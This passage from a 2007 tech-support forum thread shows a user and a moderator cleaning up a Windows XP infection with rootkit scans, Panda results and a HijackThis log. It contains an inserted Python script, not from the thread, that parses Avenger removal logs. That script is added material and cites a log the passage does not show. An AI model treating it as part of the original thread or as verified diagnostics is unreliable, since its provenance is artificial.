"Installed"="1"
"NoChange"="1"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MSFS]
"Installed"="1"


[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shellexecutehooks]
"{57B86673-276A-48B2-BAE7-C6DBB3020EB8}"="AVG Anti-Spyware 7.5"

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
"SecurityProviders"="msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll"

[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Svchost]
LocalService REG_MULTI_SZ Alerter\0WebClient\0LmHosts\0RemoteRegistry\0upnphost\0SSDPSRV\0\0
NetworkService REG_MULTI_SZ DnsCache\0\0
rpcss REG_MULTI_SZ RpcSs\0\0
imgsvc REG_MULTI_SZ StiSvc\0\0
termsvcs REG_MULTI_SZ TermService\0\0



********************************************************************

catchme 0.2 W2K/XP/Vista - userland rootkit detector by Gmer, 17 October 2006
http://www.gmer.net

scanning hidden processes ...

scanning hidden services ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden processes: 0
hidden services: 0
hidden files: 0

********************************************************************

Completion time: 07-03-20 21:26:05
C:\ComboFix2.txt ... 07-03-18 14:48
C:\ComboFix3.txt ... 07-03-18 12:06

---------------------------------------------
I checked the C/Windows/system32 for setup_####.exe files and did not see any. I also did not see the I folder that had been present. AVG has not popped up with any threats. I have not done anything else at this point but will check IE and put that in next post.
cul8rman is offline  
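Added example (not from this thread, and not code from The Avenger's author): a Python script that reads an Avenger script together with the avenger.txt it produced and reports, per requested action, whether a failure was logged, which NTSTATUS it carried, and what the preceding "not found" lines say. In the log above both actions returned 0xc0000034, STATUS_OBJECT_NAME_NOT_FOUND, meaning the object was not there when Avenger ran; the "Registry key ...\Services\C:\WINDOWS\System32\ntio256.sys not found!" line also shows the unload target was appended verbatim to the Services key, so the script warns when a driver-unload target looks like a file path. The NTSTATUS names come from the Windows SDK; the sample script and log text are trimmed from what was posted in this thread.

```python
"""Reconcile an Avenger script against the avenger.txt it produced.  Added
example: not part of the thread and not code from The Avenger's author.  It
parses the script sections and the failure records in the log so the analyst
sees which requested actions failed, with what NTSTATUS, and why."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Well-known NTSTATUS values (from the Windows SDK ntstatus.h).
NTSTATUS = {
    0xC0000022: "STATUS_ACCESS_DENIED",
    0xC0000034: "STATUS_OBJECT_NAME_NOT_FOUND",
    0xC000003A: "STATUS_OBJECT_PATH_NOT_FOUND",
    0xC0000043: "STATUS_SHARING_VIOLATION",
}
# Script section -> wording Avenger prints when that action fails (as seen in the log).
SECTION_TO_ACTION = {"Drivers to unload": "Unload of driver", "Files to delete": "Deletion of file"}

SECTION_RE = re.compile(r"^([A-Z][A-Za-z ]+):$")
FAIL_RE = re.compile(r"^(Unload of driver|Deletion of file) (.+) failed!$")
NOT_FOUND_RE = re.compile(r"^(?:Registry key|File) .+ not found!$")
STATUS_RE = re.compile(r"^Status: (0x[0-9A-Fa-f]{8})$")


@dataclass
class Failure:
    action: str
    target: str
    status: Optional[int] = None
    details: List[str] = field(default_factory=list)  # "... not found!" lines printed just before


def parse_avenger_script(text: str) -> List[Tuple[str, str]]:
    """Return (section, target) pairs in script order."""
    actions, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = SECTION_RE.match(line)
        if m:
            section = m.group(1)
        elif section:
            actions.append((section, line))
    return actions


def parse_avenger_log(text: str) -> List[Failure]:
    """Collect each 'X failed!' record with its Status line and preceding detail lines."""
    failures, pending = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if NOT_FOUND_RE.match(line):
            pending.append(line)
            continue
        m = FAIL_RE.match(line)
        if m:
            failures.append(Failure(m.group(1), m.group(2), details=pending))
            pending = []
            continue
        m = STATUS_RE.match(line)
        if m and failures and failures[-1].status is None:
            failures[-1].status = int(m.group(1), 16)
    return failures


def reconcile(script_text: str, log_text: str) -> List[Dict[str, object]]:
    """One report row per requested action, in script order."""
    failures = parse_avenger_log(log_text)
    report = []
    for section, target in parse_avenger_script(script_text):
        action = SECTION_TO_ACTION.get(section, section)
        row: Dict[str, object] = {"action": action, "target": target, "outcome": "no failure recorded"}
        hit = next((f for f in failures if f.action == action and f.target == target), None)
        if hit is not None:
            row["outcome"] = "failed"
            row["status"] = NTSTATUS.get(hit.status, "unknown" if hit.status is None else hex(hit.status))
            row["details"] = hit.details
        # The log shows the unload target appended verbatim to ...\Services\; a full
        # file path there cannot name a service key, so the driver itself was never checked.
        if action == "Unload of driver" and "\\" in target:
            row["warning"] = "unload target looks like a file path rather than a service name"
        report.append(row)
    return report


# Script and log text as posted in this thread (log trimmed to the relevant lines).
SAMPLE_SCRIPT = r"""
Drivers to unload:

C:\WINDOWS\System32\ntio256.sys

Files to delete:

C:\WINDOWS\System32\ntio256.sys
"""

SAMPLE_LOG = r"""
Logfile of The Avenger version 1, by Swandog46
Running from registry key:
\Registry\Machine\System\CurrentControlSet\Services\tkxembmv

Beginning to process script file:

Registry key \Registry\Machine\System\CurrentControlSet\Services\C:\WINDOWS\System32\ntio256.sys not found!
Unload of driver C:\WINDOWS\System32\ntio256.sys failed!

Could not process line:
C:\WINDOWS\System32\ntio256.sys
Status: 0xc0000034

File C:\WINDOWS\System32\ntio256.sys not found!
Deletion of file C:\WINDOWS\System32\ntio256.sys failed!

Could not process line:
C:\WINDOWS\System32\ntio256.sys
Status: 0xc0000034

Completed script processing.
"""

if __name__ == "__main__":
    for row in reconcile(SAMPLE_SCRIPT, SAMPLE_LOG):
        print(row)
```

Reading the two rows side by side is the point: the file deletion failed because the file was already gone, while the driver unload failed before any driver was looked at, so the log on its own does not tell you whether a driver by that name was loaded.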
Old 03-20-2007, 10:54 PM   #72 (permalink)
Registered User
 
 
Join Date: Aug 2006
Location: Arizona
Posts: 134
OS: XP


Re: MS Windows XP will not load when connected to internet

IE worked fine along with saving files; I had problems before when selecting a different location in the drop-down menu. IE and Firefox load quickly.

Did you beat the virus or do I need to check again with Panda?

Thanks for your hard work on this and Pancake as well.
cul8rman is offline  
Old 03-21-2007, 08:18 AM   #73 (permalink)
Assistant Manager, TSF Academy; Moderator/Analyst Security Team
 
 
Join Date: Jan 2005
Location: Ohio
Posts: 26,557
OS: WinXP and Vista


Re: MS Windows XP will not load when connected to internet

I'm a bit leery to say we've eradicated this infection at this point. I'd like to see an online scan and wait a few reboots to see how things develop.

Perform an online scan with Internet Explorer with Panda ActiveScan
  1. Click on located at the bottom of the page.
  2. A "pop up" window will appear. * Please ensure that your pop up blocker doesn't block it *
  3. Enter your e-mail address, country, and state & click "Free Online Scan" *The download of the 8 MB Panda's ActiveX control will take place*
Begin the scan by selecting
  • If it finds any malware, it will offer you a report.
  • Please ignore any entry it finds and the offer to buy the program to remove the entry, as we will address this later.
  • Click on then click
* You needn't remain online while it's doing the scan but you have to re-connect after it has finished to see the report.
* Turn off the real time scanner of any existing antivirus program while performing the online scan


--------------------------------------------------------

Also, since you began this thread a new tool has been developed to replace ComboScan. Delete ComboScan.exe and please download the following:

Download Deckard's System Scanner (DSS) to your Desktop.

What DSS will do:
  • create a new System Restore point in Windows XP and Vista.
  • clean your Temporary Files, Downloaded Program Files, and Internet Cache Files, and also empty the Recycle Bin on all drives.
  • check some important areas of your system and produce a report for your analyst to review. DSS automatically runs HijackThis for you, but it will also install and place a shortcut to HijackThis on your desktop if you do not already have HijackThis installed.

Note: You must be logged onto an account with administrator privileges.
  1. Close all applications and windows.
  2. Double-click on dss.exe to run it, and follow the prompts.
  3. When the scan is complete, two text files will open - main.txt <- this one will be maximized, and extra.txt <- this one will be minimized
  4. Copy (Ctrl+A then Ctrl+C) and paste (Ctrl+V) the contents of main.txt in your thread in the HijackThis Log Help Forum.
  5. Please attach extra.txt to your post.
To attach a file to a new post, simply
  1. Click the [Manage Attachments] button under Additional Options > Attach Files on the post composition page, and
  2. copy and paste the following into the "Upload File from your Computer" box:
    C:\Deckard\System Scanner\extra.txt
  3. Click Upload.

-----------------------------------------------------

Please include the following in your next reply:

Panda results
main.txt
an attached extra.txt
Ried is offline  
Old 03-21-2007, 11:23 PM   #74 (permalink)
Registered User
 
 
Join Date: Aug 2006
Location: Arizona
Posts: 134
OS: XP


Re: MS Windows XP will not load when connected to internet

I was not so excited when I saw results of Panda, but then I do not have the expert eye you do.

Panda Results


Incident Status Location

Adware:adware/savenow Not disinfected Windows Registry
Potentially unwanted tool:application/funweb Not disinfected hkey_classes_root\FunWebProducts.DataControl.1
Adware:adware/wupd Not disinfected Windows Registry
Adware:adware/antivirus-gold Not disinfected Windows Registry
Adware:adware/easysearch Not disinfected Windows Registry
Adware:adware/adtomi Not disinfected Windows Registry
Adware:adware/browseraid Not disinfected Windows Registry
Spyware:Cookie/Advertising Not disinfected C:\Documents and Settings\Duane\Application Data\Mozilla\Firefox\Profiles\wchylb0m.default\cookies.txt[.advertising.com/]
Spyware:Cookie/Mediaplex Not disinfected C:\Documents and Settings\Duane\Application Data\Mozilla\Firefox\Profiles\wchylb0m.default\cookies.txt[.mediaplex.com/]
Spyware:Cookie/Doubleclick Not disinfected C:\Documents and Settings\Duane\Application Data\Mozilla\Firefox\Profiles\wchylb0m.default\cookies.txt[.doubleclick.net/]
Spyware:Cookie/Atlas DMT Not disinfected C:\Documents and Settings\Duane\Application Data\Mozilla\Firefox\Profiles\wchylb0m.default\cookies.txt[.atdmt.com/]
Spyware:Cookie/Serving-sys Not disinfected C:\Documents and Settings\Duane\Application Data\Mozilla\Firefox\Profiles\wchylb0m.default\cookies.txt[.serving-sys.com/]
Spyware:Cookie/Serving-sys Not disinfected C:\Documents and Settings\Duane\Application Data\Mozilla\Firefox\Profiles\wchylb0m.default\cookies.txt[.bs.serving-sys.com/]
Spyware:Cookie/QuestionMarket Not disinfected C:\Documents and Settings\Duane\Application Data\Mozilla\Firefox\Profiles\wchylb0m.default\cookies.txt[.questionmarket.com/]
Spyware:Cookie/2o7 Not disinfected C:\Documents and Settings\Duane\Cookies\duane@2o7[1].txt
Spyware:Cookie/Atlas DMT Not disinfected C:\Documents and Settings\Duane\Cookies\duane@atdmt[2].txt
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Duane\Desktop\SDFix\apps\Process.exe
Virus:W32/Sdbot.ftp.worm Disinfected C:\Documents and Settings\Duane\Desktop\SDFix\backups\backups.zip[backups/i]
Virus:W32/Sdbot.ftp.worm Disinfected C:\Documents and Settings\Duane\Desktop\SDFix\backups_old1\backups.zip[backups/i]
Hacktool:Rootkit/Rustock Not disinfected C:\Documents and Settings\Duane\Desktop\SDFix\backups_old3\backups.zip[backups/lzx32.sys]
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Duane\Desktop\SDFix.exe[SDFix\apps\Process.exe]
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Duane\Desktop\SmitfraudFix\Process.exe
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Duane\Desktop\VirtumundoBeGone.exe[²ƒÇ]
Potentially unwanted tool:Application/NirCmd.A Not disinfected C:\Documents and Settings\Duane\nircmd.exe
Spyware:Cookie/YieldManager Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[ad.yieldmanager.com/]
Spyware:Cookie/Atlas DMT Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.atdmt.com/]
Spyware:Cookie/Casalemedia Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.casalemedia.com/]
Spyware:Cookie/Tribalfusion Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.tribalfusion.com/]
Spyware:Cookie/BurstNet Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.burstnet.com/]
Spyware:Cookie/Doubleclick Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.doubleclick.net/]
Spyware:Cookie/FastClick Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.fastclick.net/]
Spyware:Cookie/RealMedia Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.realmedia.com/]
Spyware:Cookie/BurstBeacon Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[www.burstbeacon.com/]
Spyware:Cookie/Hitbox Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.hitbox.com/]
Spyware:Cookie/Mediaplex Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.mediaplex.com/]
Spyware:Cookie/QuestionMarket Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.questionmarket.com/]
Spyware:Cookie/Searchportal Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.searchportal.information.com/]
Spyware:Cookie/Advertising Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.advertising.com/]
Spyware:Cookie/Adrevolver Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.adrevolver.com/]
Spyware:Cookie/Zedo Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.zedo.com/]
Spyware:Cookie/Server.iad.Liveperson Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[server.iad.liveperson.net/]
Spyware:Cookie/Server.iad.Liveperson Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[server.iad.liveperson.net/hc/15514262]
Spyware:Cookie/2o7 Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.2o7.net/]
Spyware:Cookie/Winantivirus Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[www.winantivirus.com/]
Spyware:Cookie/Traffic Marketplace Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.trafficmp.com/]
Spyware:Cookie/Overture Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.overture.com/]
Spyware:Cookie/Azjmp Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.azjmp.com/]
Spyware:Cookie/PointRoll Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.ads.pointroll.com/]
Spyware:Cookie/Overture Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.perf.overture.com/]
Spyware:Cookie/Com.com Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.com.com/]
Spyware:Cookie/Falkag Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.as-eu.falkag.net/]
Spyware:Cookie/GoStats Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.gostats.com/]
Spyware:Cookie/Statcounter Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.statcounter.com/]
Spyware:Cookie/Reliablestats Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[stats1.reliablestats.com/]
Spyware:Cookie/WebtrendsLive Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[statse.webtrendslive.com/]
Spyware:Cookie/RealMedia Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.247realmedia.com/]
Spyware:Cookie/Systemdoctor Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[systemdoctor.com/]
Spyware:Cookie/Atwola Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.atwola.com/]
Spyware:Cookie/myaffiliateprogram Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.www.myaffiliateprogram.com/]
Spyware:Cookie/Linksynergy Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.linksynergy.com/]
Spyware:Cookie/Apmebf Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.apmebf.com/]
Spyware:Cookie/Valueclick Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.valueclick.com/]
Spyware:Cookie/BurstNet Not disinfected C:\Documents and Settings\Others\Application Data\Mozilla\Firefox\Profiles\5rw0vw5m.default\cookies.txt[.burstnet.com/]
Spyware:Cookie/Com.com Not disinfected C:\Documents and Settings\Others\Application Data\Mozilla\Firefox\Profiles\5rw0vw5m.default\cookies.txt[.com.com/]
Potentially unwanted tool:Application/VSToolbar Not disinfected C:\Program Files\Hijack This\backups\backup-20070301-200021-574.dll
Potentially unwanted tool:Application/Processor Not disinfected C:\SmitfraudFix\Process.exe
Potentially unwanted tool:Application/Processor Not disinfected C:\WINDOWS\system32\Process.exe


Main.txt file

Deckard's System Scanner v20070318.32
Run by Duane on 2007-03-21 at 21:15:08
Computer is in Normal Mode.
--------------------------------------------------------------------------------

-- System Restore --------------------------------------------------------------

Successfully created a Deckard's System Scanner Restore Point.


-- Last 5 Restore Point(s) --
93: 2007-03-22 04:15:13 UTC - RP311 - Deckard's System Scanner Restore Point
92: 2007-03-21 05:37:53 UTC - RP310 - System Checkpoint
91: 2007-03-20 04:34:08 UTC - RP309 - System Checkpoint
90: 2007-03-18 17:14:39 UTC - RP308 - System Checkpoint
89: 2007-03-17 16:28:22 UTC - RP307 - System Checkpoint


-- First Restore Point --
1: 2006-12-25 23:07:54 UTC - RP219 - System Checkpoint


Backed up registry hives.

Performed disk cleanup.


-- HijackThis (run as Duane.exe) -----------------------------------------------

Logfile of HijackThis v1.99.1
Scan saved at 9:15:46 PM, on 3/21/2007
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Ulead Systems\Ulead Photo Explorer 8.0 SE Basic\Monitor.exe
C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb10.exe
C:\Program Files\HP\hpcoretech\hpcmpmgr.exe
C:\Program Files\Hewlett-Packard\HP Software Update\HPWuSchd2.exe
C:\Program Files\Picasa2\PicasaMediaDetector.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\PROGRA~1\Grisoft\AVG7\avgcc.exe
C:\Program Files\Micro Innovations\Keyboard\kbdap32a.EXE
C:\Program Files\Micro Innovations\Mouse\mouse32a.exe
C:\Program Files\Java\jre1.6.0\bin\jusched.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\BigFix\BigFix.exe
C:\Program Files\Ulead Systems\Ulead Photo Express 4.0 SE\CalCheck.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\HP\hpcoretech\comp\hptskmgr.exe
C:\WINDOWS\wanmpsvc.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Documents and Settings\Duane\Desktop\dss.exe
C:\PROGRA~1\HIJACK~1\Duane.exe

R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://www.emachines.com/
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O2 - BHO: Yahoo! Companion BHO - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\ycomp5_3_16_0.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {243B17DE-77C7-46BF-B94B-0B5F309A0E64} - C:\Program Files\Microsoft Money\System\mnyside.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar3.dll
O2 - BHO: EpsonToolBandKicker Class - {E99421FB-68DD-40F0-B4AC-B7027CAE2F1A} - C:\Program Files\EPSON\EPSON Web-To-Page\EPSON Web-To-Page.dll
O3 - Toolbar: EPSON Web-To-Page - {EE5D279F-081B-4404-994D-C6B60AAEBA6D} - C:\Program Files\EPSON\EPSON Web-To-Page\EPSON Web-To-Page.dll
O3 - Toolbar: Yahoo! Companion - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\ycomp5_3_16_0.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar3.dll
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [SSC_UserPrompt] C:\Program Files\Common Files\Symantec Shared\Security Center\UsrPrmpt.exe
O4 - HKLM\..\Run: [Ulead AutoDetector] C:\Program Files\Ulead Systems\Ulead Photo Explorer 8.0 SE Basic\Monitor.exe
O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb10.exe
O4 - HKLM\..\Run: [HP Component Manager] "C:\Program Files\HP\hpcoretech\hpcmpmgr.exe"
O4 - HKLM\..\Run: [HP Software Update] "C:\Program Files\Hewlett-Packard\HP Software Update\HPWuSchd2.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [Picasa Media Detector] C:\Program Files\Picasa2\PicasaMediaDetector.exe
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVG7\avgcc.exe /STARTUP
O4 - HKLM\..\Run: [OFFICEKB] C:\Program Files\Micro Innovations\Keyboard\kbdap32a.EXE
O4 - HKLM\..\Run: [FLMOFFICE4DMOUSE] C:\Program Files\Micro Innovations\Mouse\mouse32a.exe
O4 - HKLM\..\Run: [PC Pitstop Optimize Scheduler] C:\Program Files\PCPitstop\Optimize\PCPOptimize.exe -boot
O4 - HKLM\..\Run: [SmcService] C:\PROGRA~1\Sygate\SPF\smc.exe -startgui
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0\bin\jusched.exe"
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Microsoft Works Update Detection] c:\Program Files\Microsoft Works\WkDetect.exe
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\1.2.1128.5462\GoogleToolbarNotifier.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: BigFix.lnk = C:\Program Files\BigFix\BigFix.exe
O4 - Global Startup: Ulead Photo Express 4.0 SE Calendar Checker .lnk = C:\Program Files\Ulead Systems\Ulead Photo Express 4.0 SE\CalCheck.exe
O8 - Extra context menu item: &Google Search - res://c:\program files\google\GoogleToolbar1.dll/cmsearch.html
O8 - Extra context menu item: &Translate English Word - res://c:\program files\google\GoogleToolbar1.dll/cmwordtrans.html
O8 - Extra context menu item: Backward Links - res://c:\program files\google\GoogleToolbar1.dll/cmbacklinks.html
O8 - Extra context menu item: Cached Snapshot of Page - res://c:\program files\google\GoogleToolbar1.dll/cmcache.html
O8 - Extra context menu item: Similar Pages - res://c:\program files\google\GoogleToolbar1.dll/cmsimilar.html
O8 - Extra context menu item: Translate Page into English - res://c:\program files\google\GoogleToolbar1.dll/cmtrans.html
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0\bin\ssv.dll
O9 - Extra button: ICQ - {6224f700-cba3-4071-b251-47cb894244cd} - C:\Program Files\ICQ\ICQ.exe
O9 - Extra 'Tools' menuitem: ICQ - {6224f700-cba3-4071-b251-47cb894244cd} - C:\Program Files\ICQ\ICQ.exe
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dll
O9 - Extra button: MoneySide - {E023F504-0C5A-4750-A1E7-A9046DEA8A21} - C:\Program Files\Microsoft Money\System\mnyside.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O9 - Extra 'Tools' menuitem: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O14 - IERESET.INF: START_PAGE_URL=http://www.emachines.com
O16 - DPF: Video Poker - http://download.games.yahoo.com/game...s/y/vpt0_x.cab
O16 - DPF: Yahoo! Backgammon - http://download.games.yahoo.com/game...ts/y/at1_x.cab
O16 - DPF: Yahoo! Bingo - http://download.games.yahoo.com/game...ts/y/xt0_x.cab
O16 - DPF: Yahoo! Blackjack - http://download.games.yahoo.com/game...ts/y/jt0_x.cab
O16 - DPF: Yahoo! Checkers - http://download.games.yahoo.com/game...ts/y/kt4_x.cab
O16 - DPF: Yahoo! Chess - http://download.games.yahoo.com/game...ts/y/ct2_x.cab
O16 - DPF: Yahoo! Cribbage - http://download.games.yahoo.com/game...ts/y/it1_x.cab
O16 - DPF: Yahoo! Dice - http://download.games.yahoo.com/game...s/y/dct4_x.cab
O16 - DPF: Yahoo! Go Fish - http://download.games.yahoo.com/game...ts/y/zt3_x.cab
O16 - DPF: Yahoo! Klondike Solitaire - http://presence.games.yahoo.com/yog/y/ks12_x.cab
O16 - DPF: Yahoo! Poker - http://download.games.yahoo.com/game...ts/y/pt3_x.cab
O16 - DPF: Yahoo! Pyramids - http://download.games.yahoo.com/game...s/y/pyt1_x.cab
O16 - DPF: {01113300-3E00-11D2-8470-0060089874ED} (Support.com Configuration Class) - http://support.cox.com/sdccommon/download/tgctlcm.cab
O16 - DPF: {11260943-421B-11D0-8EAC-0000C07D88CF} (iPIX ActiveX Control) - http://www.ipix.com/viewers/ipixx.cab
O16 - DPF: {4620BC29-8B8E-4F4E-9D92-1DB6633D6793} (SurferNETWORK Plugin) - http://rd1.surfernetwork.com/surferplugin.ocx
O16 - DPF: {56336BCB-3D8A-11D6-A00B-0050DA18DE71} - http://software-dl.real.com/14939218...p/RdxIE601.cab
O16 - DPF: {62789780-B744-11D0-986B-00609731A21D} (Autodesk MapGuide ActiveX Control) - http://maricopa.gov/assessor/gis/plugin/mgaxctrl.cab
O16 - DPF: {7FE26BE2-B923-4B41-9834-E84DA1CC1F96} (Maid Control) - http://vsp.closetmaid.com/vsp/cmaidc...downloader.cab
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://acs.pandasoftware.com/actives...ree/asinst.cab
O16 - DPF: {CC05BC12-2AA2-4AC7-AC81-0E40F83B1ADF} (Live365Player Class) - http://www.live365.com/players/play365.cab
O16 - DPF: {D77EF652-9A6B-40C8-A4B9-1C0697C6CF41} (TikGames Online Control) - http://download.games.yahoo.com/game.../gpcontrol.cab
O16 - DPF: {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} (PopCapLoader Object) - http://download.games.yahoo.com/game...ploader_v6.cab
